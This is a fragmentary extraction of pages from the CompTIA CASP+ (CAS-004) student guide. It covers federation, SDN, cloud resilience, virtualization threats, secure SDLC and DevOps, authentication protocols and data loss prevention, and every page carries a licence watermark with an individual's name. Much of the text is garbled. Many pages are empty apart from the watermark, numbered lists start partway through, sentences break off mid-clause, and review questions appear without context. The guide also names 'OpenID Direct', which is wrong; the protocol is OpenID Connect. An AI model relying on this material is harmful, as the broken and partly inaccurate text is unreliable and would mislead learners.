Federation is the notion that a network needs to be accessible to more than just
a well-defined group of employees. In business, a company might need to make
parts of its network open to partners, suppliers, and customers. The company can
manage its employee accounts easily enough. Managing accounts for each supplier
or customer internally may be more difficult. Federation means that the company
trusts accounts created and managed by a different network. As another example,
allowing users to use an established Google account to access an organizationʼs
website. If Google and the website establish a federated association for the purpose
of authentication and authorization, then the user can log on to the website using
his or her Google credentials. This allows the user to access content more easily
while also preventing the organization from establishing, storing, and protecting
user credentials.
3. The principal presents the attestation to the service provider. The SP can
validate that the IdP has signed the attestation because of its trust relationship
with the IdP.
4. The service provider can now connect the authenticated principal to its own
accounts database. It may be able to query attributes of the user account
profile held by the IdP, if the principal has authorized this type of access.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 85
• Data plane—Handles the actual switching and routing of traffic and imposition
of access control lists (ACLs) for security
• SDN Overlay—Allows the use of software to create and manage new virtual
networks which leverage existing hardware. All network management and
configuration is performed via software, and new, virtual networking devices
are defined within software. This “overlay” moves data across existing physical
network hardware, but the network hardware is no longer managed or
configured directly, it simply moves the data controlled by the SDN.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
86 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
7
Defensible Network Design
Answer the following questions:
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 87
Topic 4C
Implement Durable Infrastructures
6
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
88 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
that the API gateway can direct requests to the cache to improve performance and
reduce load on the main components of a service. Using a separate cache in this
manner also allows for the cache to be independently scaled up to meet capacity
demands.
A global Content Delivery Network showing an Origin Server located in the E.U. and Edge Servers
distributed globally.
Diversity/Heterogeneity
Put simply, heterogeneous, or diverse, components are components that are
not the same as or similar to each other. In an enterprise, these translate to the
use of multiple vendor products in a security solution. This diversity adds a layer
of complexity that can slow an adversary from infiltrating an enterprise before
detection. Using a single-security vendor solution or a single vendor hardware suite
provides high levels of interoperability but also provides a unique attack target as
gaining access to one element may provide much easier exploitation of the entire
suite of products. From the viewpoint of security, diversity and heterogeneity
make sense, but this approach conflicts with information technology management
approaches that frequently look to consolidate platforms and reduce product
portfolios to simplify vendor relationships and supportability.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 89
Distributed Allocation
Distributed allocation describes the capability to spread workloads among multiple
cooperating units. This capability can provide many benefits, such as fault tolerance
in the event a unit (such as a computer or even data center) fails, increased
throughput by performing tasks in parallel, and scalability because distributed
allocation typically allows units to be added and removed as needed to meet
demand.
In practical terms, distributed allocation is associated with cloud platforms and
describes the ability to locate services across multiple Regions or Availability Zones.
This can support high availability needs by allowing services to run in different data
centers in case one were to go offline but also allows for the strategic placement
of services in the closest geographic region needed to provide the highest
performance. Regulatory requirements must first be identified to determine any
geographic restrictions applicable to the services or data, such as GDPR, that may
limit where data can be physically located.
Replication
Data replication allows businesses to copy data to where it can be utilized
most effectively. The cloud may be used as a central storage area, making
data available among all operating units. Data replication requires low latency
network connections, security, and data integrity. CSPs offer several data storage
performance tiers in response to these needs. The terms hot and cold storage
refer to how quickly data is retrieved. Hot storage retrieves data more quickly than
cold, but the quicker the data retrieval, the higher the cost. Different applications
have diverse replication requirements. For example, a database generally needs
low-latency, synchronous replication, as transactions often cannot be considered
complete until they have been made on all replicas. In contrast to this, a mechanism
to replicate data files to backup storage might not have such high requirements,
depending on the criticality of the data.
Clustering
Clustering allows multiple redundant processing nodes that share data with one
another to accept connections. This provides redundancy. If one of the nodes in the
cluster stops working, connections can failover to a working node. To clients, the
cluster appears to be a single server. This is referred to as active/passive clustering.
The major advantage of active/passive configurations is that performance is not
adversely affected during failover.
An active/active cluster means that both nodes are processing connections
concurrently. This allows for maximum capacity by leveraging the power of all
available hardware as all nodes are functional. In the event of a failover, the
workload of the failed node is immediately and transparently shifted onto the
remaining nodes.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
90 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
One basic distinction that can be made between virtual platforms is between host
and bare metal methods of interacting with the host hardware. In a guest OS (or
host-based) system, the hypervisor application (known as a Type II hypervisor) is
itself installed onto a host-operating system. Examples of host-based hypervisors
include VMware Workstation, Oracle Virtual Box, and Parallels Workstation. The
hypervisor software must support the host OS.
A bare metal virtual platform means that the hypervisor (Type I hypervisor) is
installed directly onto the computer and manages access to the host hardware
without going through a host OS. Examples include VMware ESXi Server, Microsoftʼs
Hyper-V, and Citrixʼs XEN Server. The hardware needs only support the base system
requirements for the hypervisor plus resources for the type and number of guest
OSs that will be installed.
Application Virtualization
Application virtualization is a more limited type of VDI. Rather than run the whole
client desktop as a virtual platform, the client either accesses an application
hosted on a server or streams the application from the server to the client for local
processing. Most application virtualization solutions are based on Citrix XenApp
(formerly MetaFrame/Presentation Server), though Microsoft has developed
an App-V product with its Windows Server range and VMware has the ThinApp
product. These solution types are now often used with HTML5 remote desktop
apps, referred to as “clientless” because users can access them through ordinary
web browser software.
Containerization
Another method of virtualization is container-based virtualization technology, also
called operating system-level virtualization. Container virtualization does not use
the hypervisor associated with traditional virtualization, instead it leverages the
capabilities of a full operating system. Container virtualization provides the bare
essential components required for an application to run and, because it dispenses
with the hardware emulation provided by a hypervisor, offers performance
improvements. The operating system kernel fulfills the role previously held by the
hypervisor and establishes namespaces to provide what appears to a containerized
application as a unique operating system instance, even though in reality it is
shared by many other applications.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 91
Docker, the popular and widely adopted container platform, has a useful website
describing containers:
https://www.docker.com/resources/what-container
Microsoft also provides a useful description of containers on their site:
https://azure.microsoft.com/en-us/overview/what-is-a-container/
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
92 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Auto scaling should be configured to operate within boundaries defined to establish minimum,
maximum and desired capacity.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 93
The basis of SOAR is to scan security and threat intelligence data collected from
multiple sources within the enterprise and then analyze it using various techniques
defined via playbooks. A SOAR can also assist with provisioning tasks, such as
creating and deleting user accounts, making shares available, or launching VMs
from templates. The SOAR will use technologies such as cloud and SDN/SDV
APIs, orchestration tools, and cyberthreat intelligence (CTI) feeds to integrate the
different systems that it is managing. It will also leverage technologies such as
automated malware signature creation and user and entity behavior analytics
(UEBA) to detect and identify threats.
An incident response workflow is a classic example of a SOAR task defined within
a playbook. A playbook contains a checklist of actions to perform in response to a
specific event. A playbook should be made highly specific by including the query
strings and signatures that will detect a particular type of incident. A playbook will
also account for compliance factors, such as whether an incident must be reported
as a breach, plus when and to whom notification must be made. Where a playbook
is implemented with a high degree of automation from a SOAR system, it can be
referred to as a runbook, though the terms are also widely used interchangeably.
The aim of a runbook is to automate as many stages of the playbook as possible,
leaving clearly defined interaction points for human analysis. These interaction
points should try to present all the contextual information and guidance needed for
the analyst to make a quick, informed decision about the best way to proceed with
incident mitigation.
Vulnerability Description
VM escape An attacker executes code in a VM that allows an application
running on the VM to escape and interact directly with the
hypervisor. VM escape could give the attacker access to the
underlying host operating systems and thereby access to all
other VMs running on that host machine. This is one of the
most serious threats to virtual security.
Privilege escalation An attacker exploits a design flaw or oversight in an
operating system or application to obtain higher-level
privileges and access to resources that they would normally
not be able to access. In a virtualized environment, an
attacker with elevated privileges could access the host
machine and do anything an administrator does.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
94 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Vulnerability Description
Live VM migration In some situations, you may need to move a virtual
machine from one physical host to another with no impact
to the VMʼs availability. This is called live VM migration.
Platforms like Hyper-V and VMwareʼs VMotion provide this
functionality. However, live migration can be exploited
by attackers. Hypervisors without proper authentication
and integrity protocols may enable an attacker to migrate
VMs to their own machine or migrate the VMs to a victim
machine, overloading it with a denial of service (DoS) attack.
Data remnants Data remnants are leftover information on a storage
medium even after basic attempts have been made
to remove that data. Because virtual machines are an
abstraction of a physical environment and not the real
thing, it is difficult to ensure that data you delete on the
VM will truly sanitize that data from its physical source. For
virtual machines, this is a concern during the deprovisioning
process, as remnants of the virtual instance may not be
completely removed from physical storage.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 95
Review Activity:
7
Durable Infrastructures
Answer the following questions:
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
96 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Lesson 4
Summary
6
Key Takeaways
• Many traditional devices are being replaced with software-based counterparts.
• New infrastructures, such as API and NAT Gateways, are common to cloud
platforms.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Lesson 5
Performing Software Integration
1
LESSON INTRODUCTION
Oftentimes, the term software evokes the image of a simple, single-purpose
app. The reality is that software reflects simple apps such as these but also
database management systems, hypervisors, operating systems, enterprise
application suites, security orchestration tools, firmware, web servers, software-
defined networks, and a wide range of other architecture. Software is at the very
core of the information technology used everyday across the globe. It is easy
to identify that modern architectures are highly integrated, simply remove the
network interface from a computing device and it becomes practically useless!
Therefore, it becomes immensely important to develop methods that validate
the security of software not only regarding how it is developed, but also how it
operates. In addition, software must safely integrate with other applications and
platforms. To validate this, it is essential to understand the methods used to
authenticate software integrations and software users as well as the necessary
protections for the data being processed by software at any given point in time.
Lesson Objectives
In this lesson, you will:
• Learn about software integration concepts.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
98 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 5A
Explain Secure Integration Activities
2
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 99
OWASP has a vast library of guidance and information in regard to secure coding
practices. The OWASP Secure Coding Practices Quick Reference Guide is available
via https://owasp.org/www-pdf-archive/OWASP_SCP_Quick_Reference_Guide_v2.pdf
and provides actionable guidance for developing code in the following critical areas:
• Input Validation
• Output Encoding
• Session Management
• Access Control
• Cryptographic Practices
• Data Protection
• Communication Security
• System Configuration
• Database Security
• File Management
• Memory Management
The effort, costs, and risk of addressing vulnerabilities in code after deployment are
significantly greater than the effort needed to avoid vulnerabilities by implementing
secure coding practices during the development phase. Often when security
vulnerabilities are identified after release, identifying and addressing the issues
causes negative impacts to other areas of code, driving the need for extensive
recoding and regression testing efforts.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
100 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 101
API Management
APIs provide the core mechanisms that enable integration and orchestration of the
entire information systems and technology landscape, from applications running on
operating systems, to communications between applications on different systems,
cloud operations, data feeds, and a myriad of other examples. APIs can also serve
as a valuable target for attack. For example, APIs can be exploited to gain access to
protected features of the underlying platform or used to extract sensitive data. For
this reason, it is imperative to develop policies and procedures to document and
control APIs. Developing an understanding of what APIs exist, what actions they
perform, and which systems need access to them forms the critical first steps in the
management of these APIs. Policies and procedures should be in place to define API
security feature requirements, acceptable use, and the controls needed to protect
them and detect unauthorized changes.
Middleware
Middleware generally describes more comprehensive software applications
designed to integrate two systems together. Middleware can perform more
sophisticated mechanisms and include multiple APIs to connect to various sources,
enabling more feature-rich operations or to detach features from individual
systems so they can be separately managed and controlled.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
102 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 103
2. Code
3. Build
4. Test
5. Release
6. Deploy
7. Operate
8. Monitor
Code Signing
A code signing certificate is issued to a software developer and used to sign code
in order to establish proof of origin. The developer signs the software, such as
executables or DLLs, to establish that the software has been developed by them.
Code signing is also useful in the development of scripts, such as PowerShell. Code
signing is a very important part of the software assurance process, but the presence
of a signature does not translate into any sort of guarantee regarding quality of
software or lack of vulnerabilities. The signature provides a high-level of confidence
that the software came from the expected source, such as a security patch created
by Microsoft, and the presence of signatures created by trusted authorities offers
an opportunity to configure policies requiring all software to be signed in this
way. Configuring a policy to enforce code signing is an effective way to block
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
104 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 105
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
106 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 107
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
108 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Attacks on DNS may also target the server application and/or configuration. Many
DNS services run on BIND (Berkley Internet Name Domain), distributed by the
Internet Software Consortium (isc.org). There are known vulnerabilities in many
versions of the BIND server, so it is critical to patch the server to the latest version.
The same general advice applies to other DNS server software, such as Microsoftʼs,
and patching and updates to DNS must receive the highest level of priority.
DNS footprinting describes obtaining information about a private network by
querying its DNS server directly by performing a zone transfer (extracting all the
records for a namespace), using a tool such as nslookup or dig. You can apply
an Access Control List to prevent zone transfers to unauthorized hosts or domains
or to prevent the transfer of information about the private network architecture.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 109
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
110 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
3 Secure Integration Activities
Answer the following questions:
2. What are some of the functions that can be performed via a Container
API?
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 111
Topic 5B
6
Software development practices have evolved rapidly, and the results of these
practices are all around us. Software runs on practically every item imaginable,
from the obvious, computers and servers, to the more obscure, kitchen appliances
and cars. A large majority of these applications were developed using traditional
approaches, which are focused on functionality, and while this has resulted in lots
of useful software, more and more environments are being exploited because of
poor security practices used in their development. Security requirements should
be incorporated into software development models so they can be treated as
functional requirements and therefore managed and tracked throughout the
software development life cycle.
2. Solution design
The SDLC is cyclical, as maintaining code requires a repeat of the SDLC to properly
identify and plan any required changes, patches, or updates.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
112 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
2. Solution design:
• Using Static Code Analysis tools, software linters, and automated unit tests
to identify vulnerabilities while code is being written
• Using Dynamic Code Analysis tools to evaluate application security and test
for the existence of known vulnerabilities
• Performing the misuse and abuse cases developed during the coding
phase
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 113
5. Release:
After coding has completed, and the final product is released into production, there
will invariably be a need for changes, upgrades, and/or patches. It is important to
keep this fact in mind throughout the development process so that code can be
developed in a way that most easily accommodates these future needs. Different
developers may need to implement code changes, so by creating maintainable code
it will make this process easier and therefore less likely for issues and bugs to be
introduced into code.
Whenever possible, code should be focused on a single, well-defined and
reuseable task. A classic example of this includes input validation routines,instead
of developing input validation methods for each application, a single robust and
battle-tested input validation mechanism should be created and established as a
standard for any input validation needs across all products.
After release into production, all code changes (such as insertions or upgrades)
must be carefully planned, tested, and tracked. Modern infrastructures that place
greater responsibility on developers in order to reduce the time from development
to release also potentially introduce separation of duty conflicts. Rapid release-cycle
environments should not lose sight of the need to fully manage and track code
changes and maintain full visibility into when any changes are made.
Lastly, disposal of code should include a well-established procedure which includes
the required steps needed to fully remove software and its related components. As
development projects evolve and adapt to shifting business requirements, it can be
easy to lose sight of legacy products and components, which may end up a source
breach as they fall out of visibility and upkeep. A procedure describing how to fully
decommission an application should include details outlining the steps to properly
delete (or archive) source code and binaries as well as any associated infrastructure
elements which are no longer needed, such as web servers, data interfaces,
frameworks, and/or encryption keys.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
114 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Unit Testing
In a unit test, the developer writes a simple “pass/no pass” test for code. Unit tests
ensure that a particular block of code performs the exact action intended, and
provides the exact output expected. Performing unit tests helps to identify issues
during the development phase so that they can be addressed more quickly. Unit
testing is an incredibly effective way to minimize bugs and security issues in
software.
Integration Testing
In an integration test, individual components of a system are tested together
to ensure that they interact as expected. Developers typically work on a different
module within a larger application, and integration testing is necessary to verify
that the two modules work together as expected. An integration test might be
automated as part of a continuous integration (CI) process.
In addition to functional issues, integration testing can also reveal security issues.
For example, one module may use a different cipher suite than the other when
protecting shared data.
Spiral Method
Development teams combine several approaches to software development, such
as incremental and waterfall, into a single hybrid method. Development is modified
repeatedly in response to stakeholder feedback and input but still follows an overall
beginning-to-end structure. This is most useful for large, complex, and expensive
projects, as the spiral method imposes risk analysis at each iterative step.
Agile Model
The more recent Agile model uses iterative processes to release well-tested code
in smaller blocks or units. In this model, development and provisioning tasks are
conceived as continuous.
This method focuses on adaptive measures in various phases—such as
requirements—so that development teams can more easily collaborate and
respond to changes. The agile method breaks up tasks incrementally, so that there
is no long-term planning, but only short iterations that developers can more easily
alter to fit their evolving needs. At the end of each iteration, developers present
their progress to clients and other stakeholders to receive feedback and input that
they can use in proceeding iterations. The agile method is particularly useful in
complex, unstable systems whose requirements and design are not easy to predict.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 115
SecDevOps
Sometimes described as “shift-left security,” SecDevOps places security at the
forefront of development efforts. SecDevOps builds upon the DevOps model,
which is based upon fast deployments through the implementation of continuous
workflows and tight integration between traditionally siloed groups. The risk to
rapid deployment models is the exclusion of security features to save time and
complexity. SecDevOps introduces a set of best practices designed to embed
security early in the development process.
Two essential elements to SecDevOps:
• Security as Code (SaC)—Using automated methods to introduce static code
analysis testing and dynamic application testing (DAST) as applications are
developed.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
116 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Continuous Delivery
Where CI is about managing code in development, continuous delivery is about
testing all of the infrastructure that supports the application, including networking,
database functionality, client software, and security.
Continuous Deployment
Where continuous delivery tests that an updated application (version) and its
supporting infrastructure are ready for production, continuous deployment is
the separate process of making changes to the production environment using
configuration management platforms to support the newly updated application.
Continuous Monitoring
An automation solution needs a system of continuous monitoring mechanisms
designed to detect flaws, bugs, errors, and defects. It is common for continuous
monitoring tools to require a locally installed agent in order to detect issues.
Courses of action can be automated in response to any detected issues and may
leverage security orchestration automation and response (SOAR) systems to
accomplish this.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 117
Continuous Validation
An application model describes the requirements governing a software
development project. The requirements model is tested using processes of
verification and validation (V&V):
• Verification is a compliance testing process designed to ensure that the product
or system meets its design goals.
With the continuous paradigm, feedback from delivery and deployment must be
monitored and evaluated to ensure that the design goals continue to meet user and
security requirements. The monitoring and validation processes must also ensure
that there is no drift from the secure configuration baseline.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
118 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 119
Review Activity:
Software Development Activities
7
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
120 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 5C
Analyze Access Control Models
& Best Practices
6
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 121
Password Policies
System-enforced account policies can help to enforce credential management
principles by stipulating requirements for user-selected passwords:
• Password Length—Enforces a minimum length for passwords. There may also
be a maximum length.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
122 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
OpenID
OpenID is a method of authenticating users with certain sites that participate in an
OpenID system. This enables them to retain a single account for all participating
sites. A user will register with an OpenID system in a given domain like they would
with any other account. A site under this OpenID domain will then give the user
the option to sign in using this system. The site then contacts its external OpenID
provider in order to verify that the login credentials supplied by the user are
correct. Large companies, such as Google and Amazon, use their own OpenID
systems. OpenID Direct adds a layer of authentication to OAuth 2.0, the latest
version of the protocol.
Shibboleth
Shibboleth is a federated identity method based on SAML and is often used by
universities and public service organizations. In a Shibboleth implementation, a
user attempts to retrieve resources from a Shibboleth enabled website, which
then sends SAML authentication information over URL queries. The user is then
redirected to an identity provider with which they can authenticate using this
SAML information. The identity provider then responds to the service provider (the
Shibboleth-enabled website) with the proper authentication information. The site
validates this response and grants the user access to certain resources based on
their SAML information.
Transitive Trust
In planning authentication and authorization, a trust model defines the
relationships between authentication services so that they may accept each otherʼs
assertions of usersʼ identities and permissions, when appropriate. Trust models
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 123
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
124 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
RADIUS was developed in the time of dial-up networking, but its design has stood the test of
time despite the decline of dial-up networking and modems
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 125
Diameter
Diameter improves upon RADIUS by strengthening some of its weaknesses. For
example, Diameter has a failover mechanism because it is Transmission Control
Protocol- (TCP) based, whereas RADIUS does not have a failover mechanism
because it is User Datagram Protocol- (UDP) based. Additionally, RADIUS does not
mandate confidentiality per packet, whereas Diameter does by requiring IPSec and
TLS. The name “Diameter” comes from the claim that Diameter is twice as good as
RADIUS. Diameter is a stronger protocol in many ways but is not as widespread in
its implementation due to the lack of products using it.
• All the data in TACACS+ packets is encrypted (except for the header identifying
the packet as TACACS+ data), rather than just the authentication data. This
ensures confidentiality and integrity when transferring critical network
infrastructure data.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
126 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Kerberos
Kerberos is a single sign-on network authentication and authorization protocol
used on many networks, notably as implemented by Microsoftʼs Active Directory
(AD) service. Kerberos was named after the three-headed guard dog of Hades
(Cerberus) because it consists of three parts. Clients request services from
application servers, which both rely on an intermediary—a Key Distribution
Center (KDC)—to vouch for their identity. There are two services that make up a
KDC: the Authentication Service and the Ticket Granting Service. The KDC runs on
port 88 using TCP or UDP.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 127
802.1x
Where EAP provides the authentication mechanisms, the IEEE 802.1X port-based
Network Access Control (NAC) protocol provides the means of using an EAP method
when a device connects to an Ethernet switch port, wireless access point (with
enterprise authentication configured), or VPN gateway. 802.1X uses authentication,
authorization, and accounting (AAA) architecture:
• Supplicant—The device requesting access, such as a userʼs PC or laptop
With AAA, the NAS devices do not have to store any authentication credentials. They
forward this data between the AAA server and the supplicant. There are two main
types of AAA server: RADIUS and TACACS+.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
128 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
2-Step Verification
2-step verification, or out-of-band mechanisms, generate a software token on a
server and send it to a resource assumed to be safely controlled by the user. The
token can be transmitted to the device in a number of ways:
• Short Message Service (SMS)—the code is sent as a text to the registered phone
number.
The server is configured with a counter window to cope with the circumstance that the
device and server counters move out of sync. This could happen if the user generates an
OTP but does not use it, for instance.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 129
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
130 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
Access Control Models
& Best Practices
7
2. What is the term used to describe when credentials created and stored
at an external provider are trusted for identification and authentication?
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 131
Topic 5D
Analyze Development Models
& Best Practices
6
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
132 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Each of these five stages require different considerations from the viewpoint of
protections:
1. Create—Examples include office productivity files, manual data entry, data
interfaces, external feeds, automated capture, databases, files systems, and
many others.
Data destruction methods should be defined in policy and procedure documents which
reflect legal and/or regulatory requirements.
• Critical (top secret)—The information is too valuable to allow any risk of its
capture. Viewing is severely restricted.
Data classification labels can be chosen at the discretion of the organization. Secret
and Top Secret are common labels used in military organizations but are less common
outside of that realm.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 133
Data Management
Inventory and mapping—A data inventory, or data map, describes the
mechanisms used to identify and track the data assets created, controlled, or
maintained by an organization. This takes considerable effort to accomplish
considering that data exists in a wide variety of states and formats. The data
inventory describes the data in terms of what it contains, such as intellectual
property; customer data; third-party, confidential business data; and others, as
well as its classification and sensitivity. Having a clear view of data is the first step
in protecting it, after all it is impossible to protect something if its existence is
unknown! Gaining full visibility is hindered by the complexity and dynamics of how
data is stored as well as obtaining clear information regarding what each piece of
identified data represents.
Data integrity management—Methods incorporated to ensure that data is
in the proper state, that any changes can be identified, and that the reliability
and accuracy of data can be validated throughout its life cycle. This is generally
accomplished through the implementation of software to monitor file integrity
but also through auditing, training, platform validation and assessment processes,
quality assurance programs, availability/fault tolerance mechanisms (such as RAID),
as well as backup and recovery procedures.
• Endpoint Agents—To enforce policy on client computers, even when they are
not connected to the network.
DLP agents scan content in structured formats, such as a database with a formal
access control model or unstructured formats, such as email or word processing
documents. A file cracking process is applied to unstructured data to render it in
a consistent scannable format. The transfer of content to removable media, such
as USB devices, or by email, instant messaging, or even social media, can then
be blocked if it does not conform to a predefined policy. Most DLP solutions can
extend the protection mechanisms to cloud storage services, using either a proxy to
mediate access or the cloud service providerʼs API to perform scanning and policy
enforcement.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
134 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Remediation is the action the DLP software takes when it detects a policy violation.
The following remediation mechanisms are typical:
• Alert only—The copying is allowed, but the management system records an
incident and may alert an administrator.
• Block—The user is prevented from copying the original file but retains access to
it. The user may or may not be alerted to the policy violation, but it will be logged
as an incident by the management engine.
• Quarantine—Access to the original file is denied to the user (or possibly any
user). This might be accomplished by encrypting the file in place or by moving it
to a quarantine area in the file system.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 135
DLP Examples
Scenario Description
Blocking use of external Preventing sensitive data from being copied to
media external drives and USB Flash storage.
Print blocking Preventing the printing of sensitive information
or controlled documents. This is particularly
important in the healthcare industry.
Remote Desktop Protocol RDP allows for data to be copied and pasted
(RDP) blocking from the session. DLP can be configured to
monitor and block this when sensitive data is
detected.
Clipboard privacy controls Limiting access to the clipboard and preventing
sensitive data from being placed on the clipboard
for use elsewhere.
Restricted Virtual Desktop Incorporating DLP features within the underlying
Infrastructure (VDI) VDI infrastructure to protect all virtual desktops
implementation and govern how data is used and shared in the
environment.
Data classification blocking Using metadata or other mechanisms to tag
data with its classification in order to limit how it
can be accessed and used.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
136 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Watermarking
Digital watermarking is a way to mark data in a way that clearly displays important
features or information, such as a classification, appropriate use, or terms of a
license. Watermarking does not directly control how data is used but rather as a
way to clearly identify classification or use/licensing terms.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 137
Tokenization
Tokenization is commonly used in credit card processing scenarios. Tokenization
describes the use of a token to represent sensitive data records, such as a credit
card number. The token cannot be directly converted into the sensitive data, as
would be the case with encryption, as tokens are irreversible. Customers of this
service integrate their sales systems with a credit card payment gateway provided
